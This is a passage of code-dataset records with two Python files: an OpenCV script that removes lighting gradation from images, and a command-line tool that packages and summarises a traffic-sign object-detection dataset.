+{"seq_id": "2089442678", "text": "\"\"\"\r\n\r\n조명에 의해 생긴 Gradation을 제거하기 위해...\r\n\r\nclass removeLightGradation():\r\n 1. Check Image Size \r\n 2. LAB모델을 이용한 Color Space (RGB -> LAB변환)\r\n 3. Median Filter(Radius : 20 ~ 50, 100 : 실제와 가장 근사한 조명상태 구현)\r\n 4. 3번 이미지 반전하여 역조명 채널 생성\r\n 5. 원본영상에 합성\r\n 6. Histogram 최대-최소평균으로 Golbal Thresholding\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom cv2 import cv2\r\nimport math\r\n\r\n\r\nclass removeLightGradation:\r\n\r\n def __init__(self, img):\r\n self.img = img\r\n \r\n\r\n def convertLAB(self):\r\n return cv2.cvtColor(self.img, cv2.COLOR_BGR2LAB)\r\n\r\n\r\n def addMedianFilter(self, labImg, val = 55):\r\n filterImg = cv2.medianBlur(labImg, val)\r\n return filterImg\r\n \r\n\r\n def createReverseImg(self, filterImg):\r\n return cv2.bitwise_not(filterImg)\r\n\r\n\r\n def mergeImg(self, img1, img2):\r\n return cv2.add(img1, img2)\r\n \r\n def imgBlending(self, img1, img2, val):\r\n return cv2.addWeighted(img1, val, img2, 1-val, 0)\r\n\r\n\r\n def globalThresholding(self, img):\r\n #Histogram 의 최대-최소 평균으로 Global Thresholding\r\n ret, thr = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)\r\n return thr\r\n\r\n def thresholding(self, img, threshold = 127, value = 255):\r\n #ret, thr9 = cv2.threshold(img, threshold, value, cv2.THRESH_BINARY)\r\n thr10 = cv2.adaptiveThreshold(img, value, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 11, 2)\r\n thr11 = cv2.adaptiveThreshold(img, value, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\r\n\r\n titles = ['adaptive mean', 'adaptive gaussian']\r\n images = [thr10, thr11]\r\n showPlot(titles, images)\r\n\r\n\r\ndef showImg(title, img):\r\n cv2.imshow(title, img)\r\n\r\n cv2.waitKey(0)\r\n #k=cv2.waitKey(0) & 0xFF\r\n # if k == ord('s'):\r\n cv2.destroyAllWindows()\r\n\r\n\r\ndef showPlot(titles, images):\r\n \r\n num = len(titles)\r\n \r\n if num % 2 :\r\n row = int(num/2) + 1\r\n else:\r\n row = int(num/2)\r\n \r\n #print(\"num = {1}, row = {0}\".format(row, num))\r\n \r\n cnt = 0\r\n for i in range(0,row):\r\n cnt+=1\r\n plt.subplot(row, 2, cnt), plt.imshow(images[cnt-1], cmap = 'gray')\r\n plt.title(titles[cnt-1]), plt.xticks([]), plt.yticks([])\r\n #print(\"cnt = {0}, row = {1}, [cnt-1] = {2}\".format(cnt, row, cnt-1))\r\n\r\n cnt+=1\r\n \r\n try:\r\n if titles[i+2]:\r\n plt.subplot(row, 2, cnt), plt.imshow(images[cnt-1], cmap = 'gray')\r\n plt.title(titles[cnt-1]), plt.xticks([]), plt.yticks([])\r\n #print(\"cnt = {0}, row = {1}, [cnt-1] = {2}\".format(cnt, row, cnt-1)) \r\n except:\r\n pass \r\n \r\n plt.show()\r\n\r\n\r\ndef viewResult2(viewData, row, camp = ''):\r\n#viewData = {'Original': img, 'Gray Img' : img_gray, 'Alpha Img' : img_alp}\r\n\r\n dataLen = len(viewData)\r\n cols = math.ceil(dataLen/row)\r\n #print(\"cols = \", cols)\r\n\r\n i = 1\r\n for key, val in viewData.items():\r\n subplotNo = str(cols)+str(row)+str(i)\r\n #print('key = ', key)\r\n #print('subplotNo = ', subplotNo)\r\n #cv2.imshow(key, val)\r\n\r\n\r\n if(camp == 'gray') : \r\n plt.subplot(subplotNo), plt.imshow(val, cmap = 'gray')\r\n plt.title(key), plt.xticks([]), plt.yticks([])\r\n else :\r\n plt.subplot(subplotNo), plt.imshow(val)\r\n plt.title(key), plt.xticks([]), plt.yticks([]) \r\n\r\n i = i + 1\r\n # End of for key, val int viewData.items():\r\n plt.show()\r\n\r\n\r\n# End of viewResult2()\r\n# for i in range(1,11):\r\n# if i % 2 :\r\n# row = int(i/2) + 1\r\n# else:\r\n# row = int(i / 2)\r\n# #print(\"int({0} / 2) = {1}, int(round( {0} / 2)) = 
{2}\".format(i, int(i/2), int(round(i/2))))\r\n# print(\"i = {0}, row = {1}\".format(i, row))\r\n\r\n\r\n# Open Image - Color Image로 Open 해야 함.... \r\nimg = cv2.imread('gradation03.jpg', cv2.IMREAD_COLOR)\r\nshowImg(\"원본\", img)\r\n\r\nrt = removeLightGradation(img)\r\n\r\n# Change Color Space to LAB \r\nlabImg = rt.convertLAB()\r\n#showImg('LAB', labImg)\r\n\r\n# split Channel\r\nl, a, b = cv2.split(labImg)\r\n#showImg('labImg - l', l)\r\n#showImg('labImg - a', a)\r\n#showImg('labImg - b', b)\r\n\r\n\r\n# add Median Filter\r\nfilterImg = rt.addMedianFilter(l, 55)\r\n#showImg('Median 99', filterImg)\r\nlabFilterImg = rt.addMedianFilter(labImg, 55)\r\n\r\n# make sub Img(white - img)\r\nc, r = l.shape\r\noutImg = np.ones((c,r), np.uint8)*255\r\n#showImg('outImg', outImg)\r\n#print(l.shape)\r\n#print(outImg)\r\nsubImg = outImg - l\r\n#showImg('subImg', subImg)\r\n\r\nviewData = {'original':img, 'l':l, 'outImg':outImg, 'subImg':subImg}\r\nviewResult2(viewData, 2, 'gray')\r\n\r\nfor i in range(1,6):\r\n subImg = outImg - subImg\r\nshowImg('subImg', subImg)\r\n\r\n# make Reverse Image\r\nreverseImg = rt.createReverseImg(filterImg)\r\n#showImg('reverseImg', reverseImg)\r\nreverseImg1 = rt.createReverseImg(labFilterImg)\r\ngrayReverseImg = cv2.cvtColor(reverseImg1, cv2.COLOR_LAB2BGR)\r\ngrayReverseImg = cv2.cvtColor(grayReverseImg, cv2.COLOR_BGR2GRAY)\r\n\r\n\r\ntitles = ['Filter Img - l', 'Filter Img - LAB', 'Reverse Img - l', 'Reverse Img - LAB', 'Gray Reverse Img - LAB']\r\nimages = [filterImg, labFilterImg, reverseImg, reverseImg1, grayReverseImg]\r\nshowPlot(titles, images)\r\n\r\n\r\n\r\n# Image merge\r\nmergeImg = rt.mergeImg(l, reverseImg)\r\nmergeImg1 = rt.mergeImg(l, grayReverseImg)\r\nBlendingImg = rt.imgBlending(l, reverseImg, 0.5)\r\nBlendingImg1 = rt.imgBlending(l, grayReverseImg, 0.5)\r\n\r\ntitles = [\"Merge Img - l\", \"Merge Img - LAB\", \"Blending Img - l\", \"Blending Img - LAB\", 'Original Img']\r\nimages = [mergeImg, mergeImg1, BlendingImg, BlendingImg1, img]\r\nshowPlot(titles, images)\r\n\r\n# viewData = {\"Merge Img - l\":mergeImg, \"Merge Img - LAB\":mergeImg1, \"Blending Img - l\":BlendingImg, \"Blending Img - LAB\":BlendingImg1, 'Original Img':img}\r\n# viewResult2(viewData, 2)\r\n\r\n\r\nresultImg = rt.globalThresholding(mergeImg)\r\nresultImg1 = rt.globalThresholding(mergeImg1)\r\nresultImg2 = rt.globalThresholding(BlendingImg)\r\nresultImg3 = rt.globalThresholding(BlendingImg1)\r\n\r\n# titles = ['Threshold - Merge_L', 'Threshold Merge_LAB', 'Threshold - Blending_L', 'Threshold - Blending_LAB', 'Original Img']\r\n# images = [resultImg, resultImg1, resultImg2, resultImg3, img]\r\n# showPlot(titles, images)\r\n\r\nviewData = {'Threshold - Merge_L' : resultImg, 'Threshold Merge_LAB' : resultImg1, 'Threshold - Blending_L' : resultImg2, 'Threshold - Blending_LAB' : resultImg3, 'Original Img': img}\r\nviewResult2(viewData, 2, 'gray')\r\n\r\n\r\n# showImg('Result Img', resultImg)\r\n\r\n# rt.thresholding(resultImg)\r\n# rt.thresholding(resultImg1)\r\n# rt.thresholding(resultImg2)\r\n# rt.thresholding(resultImg3)\r\n\r\n\r\n#viewData = {'Original': img, 'Gray Img' : img_gray, 'Alpha Img' : img_alp}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "SSKim76/Python_Test", "sub_path": "removeGradation.py", "file_name": "removeGradation.py", "file_ext": "py", "file_size_in_byte": 6904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.cv2.cvtColor", "line_number": 28, "usage_type": "call"}, 
{"api_name": "cv2.cv2", "line_number": 28, "usage_type": "name"}, {"api_name": "cv2.cv2.COLOR_BGR2LAB", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cv2.cv2.medianBlur", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 32, "usage_type": "name"}, {"api_name": "cv2.cv2.bitwise_not", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 37, "usage_type": "name"}, {"api_name": "cv2.cv2.add", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 41, "usage_type": "name"}, {"api_name": "cv2.cv2.addWeighted", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 44, "usage_type": "name"}, {"api_name": "cv2.cv2.threshold", "line_number": 49, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 49, "usage_type": "name"}, {"api_name": "cv2.cv2.THRESH_BINARY", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cv2.cv2.THRESH_OTSU", "line_number": 49, "usage_type": "attribute"}, {"api_name": "cv2.cv2.adaptiveThreshold", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 54, "usage_type": "name"}, {"api_name": "cv2.cv2.ADAPTIVE_THRESH_MEAN_C", "line_number": 54, "usage_type": "attribute"}, {"api_name": "cv2.cv2.THRESH_BINARY", "line_number": 54, "usage_type": "attribute"}, {"api_name": "cv2.cv2.adaptiveThreshold", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 55, "usage_type": "name"}, {"api_name": "cv2.cv2.ADAPTIVE_THRESH_GAUSSIAN_C", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cv2.cv2.THRESH_BINARY", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cv2.cv2.imshow", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 63, "usage_type": "name"}, {"api_name": "cv2.cv2.waitKey", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 65, "usage_type": "name"}, {"api_name": "cv2.cv2.destroyAllWindows", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 118, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "cv2.cv2.imread", "line_number": 140, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 140, "usage_type": "name"}, {"api_name": "cv2.cv2.IMREAD_COLOR", "line_number": 140, "usage_type": "attribute"}, {"api_name": "cv2.cv2.split", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 163, "usage_type": "attribute"}, {"api_name": "cv2.cv2.cvtColor", "line_number": 181, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 181, "usage_type": "name"}, {"api_name": "cv2.cv2.COLOR_LAB2BGR", "line_number": 181, "usage_type": "attribute"}, {"api_name": "cv2.cv2.cvtColor", "line_number": 182, "usage_type": "call"}, {"api_name": "cv2.cv2", "line_number": 182, "usage_type": "name"}, {"api_name": "cv2.cv2.COLOR_BGR2GRAY", "line_number": 182, "usage_type": "attribute"}]}
+{"seq_id": "985754575", "text": "import sys, os, argparse, csv, zipfile\nimport xml.etree.ElementTree as ET\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\n\nclass Generator():\n\n def __init__(self, path, classes=range(1, 156)):\n self.classes = classes\n self.labelmap = {0: \"speed limit 20 (prohibitory)\",\n 1: \"speed limit 30 (prohibitory)\",\n 2: \"speed limit 50 (prohibitory)\",\n 3: \"speed limit 60 (prohibitory)\",\n 4: \"speed limit 70 (prohibitory)\",\n 5: \"speed limit 80 (prohibitory)\",\n 6: \"restriction ends 80 (other)\",\n 7: \"speed limit 100 (prohibitory)\",\n 8: \"speed limit 120 (prohibitory)\",\n 9: \"no overtaking (prohibitory)\",\n 10: \"no overtaking (trucks) (prohibitory)\",\n 11: \"priority at next intersection (danger)\",\n 12: \"priority road (other)\",\n 13: \"give way (other)\",\n 14: \"stop (other)\",\n 15: \"no traffic both ways (prohibitory)\",\n 16: \"no trucks (prohibitory)\",\n 17: \"no entry (other)\",\n 18: \"danger (danger)\",\n 19: \"bend left (danger)\",\n 20: \"bend right (danger)\",\n 21: \"bend (danger)\",\n 22: \"uneven road (danger)\",\n 23: \"slippery road (danger)\",\n 24: \"road narrows (danger)\",\n 25: \"construction (danger)\",\n 26: \"traffic signal (danger)\",\n 27: \"pedestrian crossing (danger)\",\n 28: \"school crossing (danger)\",\n 29: \"cycles crossing (danger)\",\n 30: \"snow (danger)\",\n 31: \"animals (danger)\",\n 32: \"restriction ends (other)\",\n 33: \"go right (mandatory)\",\n 34: \"go left (mandatory)\",\n 35: \"go straight (mandatory)\",\n 36: \"go right or straight (mandatory)\",\n 37: \"go left or straight (mandatory)\",\n 38: \"keep right (mandatory)\",\n 39: \"keep left (mandatory)\",\n 40: \"roundabout (mandatory)\",\n 41: \"restriction ends (overtaking) (other)\",\n 42: \"restriction ends (overtaking (trucks)) (other)\",\n 43: \"restriction ends 60 (other)\",\n 44: \"restriction ends 70 (other)\",\n 45: \"speed limit 90 (prohibitory)\",\n 46: \"restriction ends 90 (other)\",\n 47: \"speed limit 110 (prohibitory)\",\n 48: \"restriction ends 110 (other)\",\n 49: \"restriction ends 120 (other)\",\n 50: \"speed limit 130 (prohibitory)\",\n 51: \"restriction ends 130 (other)\",\n 52: \"bend double right (danger)\",\n 53: \"highway turn (left) (other)\",\n 54: \"maximum width (prohibitory)\",\n 55: \"maximum height (prohibitory)\",\n 56: \"minimum truck distance (prohibitory)\",\n 57: \"highway exit 200 (other)\",\n 58: \"highway exit 100 (other)\",\n 59: \"right lane merging (other)\",\n 60: \"warning beacon roadwork (other)\",\n 61: \"speed limit 60 (digital) (prohibitory)\",\n 62: \"restriction ends 60 (digital) (other)\",\n 63: \"speed limit 70 (digital) (prohibitory)\",\n 64: \"restriction ends 70 (digital) (other)\",\n 65: \"speed limit 80 (digital) (prohibitory)\",\n 66: \"restriction ends 80 (digital) (other)\",\n 67: \"restriction ends 80 (digital) (other)\",\n 68: \"restriction ends 90 (digital) (other)\",\n 69: \"speed limit 100 (digital) (prohibitory)\",\n 70: \"restriction ends 100 (digital) (other)\",\n 71: \"speed limit 110 (digital) (prohibitory)\",\n 72: \"restriction ends 110 (digital) (other)\",\n 73: \"left lane merging (other)\",\n 74: \"speed limit 120 (digital) (prohibitory)\",\n 75: \"restriction ends 120 (digital) (other)\",\n 76: \"speed limit 130 (digital) (prohibitory)\",\n 77: \"restriction ends 130 (digital) (other)\",\n 78: \"no overtaking (digital) (prohibitory)\",\n 79: \"restriction ends 130 (digital) (other)\",\n 80: \"no overtaking (trucks) 
(digital) (prohibitory)\",\n 81: \"restriction ends (overtaking (trucks)) (other)\",\n 82: \"construction (digital) (danger)\",\n 83: \"traffic jam (digital) (danger)\",\n 84: \"highway exit (other)\",\n 85: \"traffic jam (other)\",\n 86: \"restriction distance (other)\",\n 87: \"restriction time (other)\",\n 88: \"highway exit 300m (other)\",\n 89: \"restriction ends 100 (other)\",\n 90: \"andreaskreuz (other)\",\n 91: \"one way street (left) (other)\",\n 92: \"one way street (right) (other)\",\n 93: \"beginning of highway (other)\",\n 94: \"end of highway (other)\",\n 95: \"busstop (other)\",\n 96: \"tunnel (other)\",\n 97: \"no cars (prohibitory)\",\n 98: \"train crossing (danger)\",\n 99: \"no bicycles (prohibitory)\",\n 100: \"no motorbikes (prohibitory)\",\n 101: \"no mopeds (prohibitory)\",\n 102: \"no horses (prohibitory)\",\n 103: \"no cars & motorbikes (prohibitory)\",\n 104: \"busses only (mandatory)\",\n 105: \"pedestrian zone (mandatory)\",\n 106: \"bicycle boulevard (mandatory)\",\n 107: \"end of bicycle boulevard (mandatory)\",\n 108: \"bicycle path (mandatory)\",\n 109: \"pedestrian path (mandatory)\",\n 110: \"pedestrian and bicycle path (mandatory)\",\n 111: \"separated path for bicycles and pedestrians (right) (mandatory)\",\n 112: \"separated path for bicycles and pedestrians (left) (mandatory)\",\n 113: \"play street (other)\",\n 114: \"end of play street (other)\",\n 115: \"beginning of motorway (other)\",\n 116: \"end of motorway (other)\",\n 117: \"crosswalk (zebra) (other)\",\n 118: \"dead-end street (other)\",\n 119: \"one way street (straight) (other)\",\n 120: \"priority road (other)\",\n 121: \"no stopping (prohibitory)\",\n 122: \"no stopping (beginning) (prohibitory)\",\n 123: \"no stopping (middle) (prohibitory)\",\n 124: \"no stopping (end) (prohibitory)\",\n 125: \"no parking (beginning) (prohibitory)\",\n 126: \"no parking (end) (prohibitory)\",\n 127: \"no parking (middle) (prohibitory)\",\n 128: \"no parking (prohibitory)\",\n 129: \"no parking zone (prohibitory)\",\n 130: \"end of no parking zone (prohibitory)\",\n 131: \"city limit (in) (other)\",\n 132: \"city limit (out) (other)\",\n 133: \"direction to village (other)\",\n 134: \"rural road exit (other)\",\n 135: \"speed limit 20 zone (prohibitory)\",\n 136: \"end speed limit 20 zone (prohibitory)\",\n 137: \"speed limit 30 zone (prohibitory)\",\n 138: \"end speed limit 30 zone (prohibitory)\",\n 139: \"speed limit 5 (prohibitory)\",\n 140: \"speed limit 10 (prohibitory)\",\n 141: \"restriction ends 10 (other)\",\n 142: \"restriction ends 20 (other)\",\n 143: \"restriction ends 30 (other)\",\n 144: \"speed limit 40 (prohibitory)\",\n 145: \"restriction ends 40 (other)\",\n 146: \"restriction ends 50 (other)\",\n 147: \"go left (now) (mandatory)\",\n 148: \"go right (now) (mandatory)\",\n 149: \"train crossing in 300m (other)\",\n 150: \"train crossing in 200m (other)\",\n 151: \"train crossing in 100m (other)\",\n 152: \"danger (digital) (danger)\",\n 153: \"restriction ends 100 (other)\",\n 154: \"highway turn (right) (other)\"}\n\n self.PATH = path\n self.label_names = []\n self.label_paths = []\n\n for p, dirs, filenames in os.walk(self.PATH):\n self.label_names += [f for f in filenames if f[-3:] == 'xml']\n self.label_paths += [os.path.join(p, f) for f in filenames if f[-3:] == 'xml']\n\n self.class_score = self._calculateClassScore()\n\n def deleteEmptyImages(self, path=None):\n if not path:\n path = self.PATH\n\n for p, dirs, filenames in os.walk(path):\n for file in [f for f in filenames if 
f[-3:] == 'png']:\n                if file[:-3] + 'xml' not in self.label_names:\n                    os.remove(os.path.join(p, file))\n                    print(\"%s deleted due to missing label!\" % (os.path.join(p, file)))\n\n    def _calculateClassScore(self, ):\n        class_score = {}\n\n        for label in self.label_paths:\n\n            for ob in ET.parse(label).getroot().iter('object'):\n\n                try:\n                    clazz = int(ob.find('name').text)\n                    xmin, ymin, xmax, ymax = [int(v.text) for v in ob.find('bndbox')]\n                except:\n                    print(\"Invalid class annotation in \" + label)\n                    continue\n\n                if clazz in class_score:\n                    class_score[clazz][0] += 1\n                    class_score[clazz][1] += xmin\n                    class_score[clazz][2] += ymin\n                    class_score[clazz][3] += xmax\n                    class_score[clazz][4] += ymax\n                else:\n                    class_score[clazz] = [1, xmin, ymin, xmax, ymax]\n\n        for c in class_score:\n            s = class_score[c][0]\n            class_score[c][1] = round(class_score[c][1] / s, 2)\n            class_score[c][2] = round(class_score[c][2] / s, 2)\n            class_score[c][3] = round(class_score[c][3] / s, 2)\n            class_score[c][4] = round(class_score[c][4] / s, 2)\n        return class_score\n\n    def _getClassName(self, i):\n        if i in self.labelmap:\n            return self.labelmap[i]\n        else:\n            return \"Unknown\"\n\n    def createCSVOverview(self, zipf=None):\n\n        with open(os.path.join(self.PATH, \"Summary.csv\"), 'w', newline='') as out:\n            writer = csv.writer(out, delimiter=',', quoting=csv.QUOTE_NONE)\n            writer.writerow(['Class ID', 'Class Name', 'Frequency', 'Avg Xmin', 'Avg Ymin', 'Avg Xmax', 'Avg Ymax'])\n            for c in self.class_score:\n                if c in self.classes:\n                    writer.writerow([c, self._getClassName(c), *self.class_score[c]])\n\n        if zipf:\n            zipf.write(os.path.join(self.PATH, 'Summary.csv'), 'Summary.csv', zipfile.ZIP_DEFLATED)\n            os.remove(os.path.join(self.PATH, 'Summary.csv'))\n        print(\"CSV Overview successfully created.\")\n\n    def createPieChart(self, zipf=None):\n        fig, ax = plt.subplots(figsize=(72, 36), subplot_kw=dict(aspect=\"equal\"))\n\n        data = [self.class_score[x][0] for x in self.class_score if x in self.classes]\n        label = [self._getClassName(x) for x in self.class_score if x in self.classes]\n\n        def func(pct, allvals):\n            
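# convert the wedge percentage back into an absolute object count\n            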
absolute = int(pct / 100. * np.sum(allvals))\n            return \"{:.1f}% ({:d})\".format(pct, absolute)\n\n        wedges, texts, autotexts = ax.pie(data, autopct=lambda pct: func(pct, data),\n                                          textprops=dict(color=\"w\"))\n\n        legend = ax.legend(wedges, label,\n                           title=\"Classes\",\n                           loc=\"center left\",\n                           bbox_to_anchor=(1, 0, 0.5, 1),\n                           prop={'size': 44})\n\n        plt.setp(autotexts, size=34, weight=\"bold\")\n        plt.setp(legend.get_title(), fontsize=64)\n        ax.text(0.3, 0.1, \"Total number of objects: %d\" % (np.sum(data)), fontsize=44, transform=plt.gcf().transFigure)\n        ax.set_title(\"Class distribution\", fontsize=64)\n        fig.savefig(os.path.join(self.PATH, 'Class Distribution.png'))\n\n        if zipf:\n            zipf.write(os.path.join(self.PATH, 'Class Distribution.png'), 'Class Distribution.png',\n                       zipfile.ZIP_DEFLATED)\n            os.remove(os.path.join(self.PATH, 'Class Distribution.png'))\n        print(\"Pie chart successfully created.\")\n\n    def createDataSetZIP(self, name = None, sep = None, split = None):\n        if not name:\n            name = 'DataSet.zip'\n\n        if split:\n            t = int(len(self.label_paths) / 100 * split)\n            indices = list(range(len(self.label_paths)))\n            random.shuffle(indices)\n            train = set(indices[:t])\n        else:\n            train = range(len(self.label_paths))\n\n\n        with zipfile.ZipFile(os.path.join(self.PATH, name), 'w') as zip_file:\n\n            for i in range(len(self.label_paths)):\n                if split:\n                    if i in train:\n                        folder = 'Train/'\n                    else:\n                        folder = 'Test/'\n                else:\n                    folder = ''\n\n                label = self.label_paths[i]\n                xml = label.split(os.path.sep)[-1]\n                img = xml[:-3] + \"png\"\n\n                for ob in ET.parse(label).getroot().iter('object'):\n                    c = int(ob.find('name').text)\n                    if c in self.classes:\n                        img_added = []\n                        zip_file.write(label, os.path.join(folder + 'Labels', xml), zipfile.ZIP_DEFLATED)\n\n                        for p, dirs, files in os.walk(self.PATH):\n                            if img in files:\n                                if img not in img_added:\n                                    zip_file.write(os.path.join(p, img), os.path.join(folder + \"Images\", img),\n                                                   zipfile.ZIP_DEFLATED)\n                                    img_added.append(img)\n                            else:\n                                break\n                        break\n\n            if not sep:\n                self.createPieChart(zip_file)\n                self.createCSVOverview(zip_file)\n                self.createCSVLabelMap(zip_file)\n\n    def createCSVLabelMap(self, zipf=None):\n        xml_list = []\n\n        for label in self.label_paths:\n            tree = ET.parse(label)\n            root = tree.getroot()\n\n            for member in root.findall('object'):\n                clazz = int(member.find('name').text)\n\n                if clazz in self.classes:\n                    value = (root.find('filename').text,\n                             int(root.find('size')[0].text),\n                             int(root.find('size')[1].text),\n                             self._getClassName(int(member[0].text)),\n                             int(member[4][0].text),\n                             int(member[4][1].text),\n                             int(member[4][2].text),\n                             int(member[4][3].text)\n                             )\n                    xml_list.append(value)\n        column_name = ['filename', 'width', 'height', 'class', 'xmin', 'ymin', 'xmax', 'ymax']\n        xml_df = pd.DataFrame(xml_list, columns=column_name)\n        xml_df.to_csv(os.path.join(self.PATH, 'train.csv'), index=None)\n\n        if zipf:\n            zipf.write(os.path.join(self.PATH, 'train.csv'), 'labels.csv', zipfile.ZIP_DEFLATED)\n            os.remove(os.path.join(self.PATH, 'train.csv'))\n        print(\"Label CSV successfully created.\")\n\n\nclass FullPaths(argparse.Action):\n    \"\"\"Expand user- and relative-paths\"\"\"\n    def __call__(self, parser, namespace, values, option_string=None):\n        setattr(namespace, self.dest, os.path.abspath(os.path.expanduser(values)))\n\n\ndef is_dir(dirname):\n    \"\"\"Checks if a path is an actual directory\"\"\"\n    if not os.path.isdir(dirname):\n        msg = \"{0} is not a directory\".format(dirname)\n        raise argparse.ArgumentTypeError(msg)\n    else:\n        return dirname\n\n\ndef main(argv):\n    parser = argparse.ArgumentParser(description='Generate Data Sets for Object detection!')\n    
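# Each CLI flag below invokes one of the Generator capabilities defined above.\n    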
parser.add_argument('-p', help=\"Path to the dataset folder.\", action=FullPaths, type=is_dir, metavar='PATH')\n\n    parser.add_argument('-c', help=\"Restrict to specific classes.\", metavar='classes', type=int, nargs='*')\n    parser.add_argument('--zip', help='Create the complete data set as a zip.', dest='zip', action='store_true')\n    parser.add_argument('--stat_csv', help='Create the class statistics as csv.', dest='csv', action='store_true')\n    parser.add_argument('--stat_img', help='Create the class statistics as png.', dest='img', action='store_true')\n    parser.add_argument('--del_img', help='Delete images without a label.', dest='delete', action='store_true')\n    parser.add_argument('--train_csv', help='Create train.csv for object detection.', dest='train', action='store_true')\n    parser.add_argument('--sep_class', help='Create a separate ZIP for each class.', dest='sep', action='store_true')\n    parser.add_argument('--split', help=\"Train/test split - percent used for train\", dest='split', type=int)\n\n    args = parser.parse_args(argv)\n\n    if args.c:\n        generator = Generator(args.p, args.c)\n    else:\n        generator = Generator(args.p)\n\n    if args.delete:\n        generator.deleteEmptyImages()\n\n    if args.zip:\n        if not args.sep:\n            if args.split:\n                generator.createDataSetZIP(split=args.split)\n            else:\n                generator.createDataSetZIP()\n        else:\n            if args.c:\n                classes = args.c\n            else:\n                classes = range(1, 155)\n            for c in classes:\n                gen = Generator(args.p, [c])\n                name = 'Class_' + str(c) + '.zip'\n                if args.split:\n                    gen.createDataSetZIP(name=name, sep=True, split=args.split)\n                    print(name + \" was created!\")\n                else:\n                    gen.createDataSetZIP(name=name, sep=True)\n                    print(name + \" was created!\")\n\n    if args.csv:\n        generator.createCSVOverview()\n\n    if args.img:\n        generator.createPieChart()\n\n    if args.train:\n        generator.createCSVLabelMap()\n\n\nif __name__ == '__main__':\n    main(sys.argv[1:])", "repo_name": "Project-Road-Sign-Detection/Tensorflow-Street-Sign-Recognition", "sub_path": "Data Set Pipeline/DataSetCLI.py", "file_name": "DataSetCLI.py", "file_ext": "py", "file_size_in_byte": 20036, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 47, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.walk", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path", "line_number": 174, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 182, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 185, "usage_type": "call"}, {"api_name": 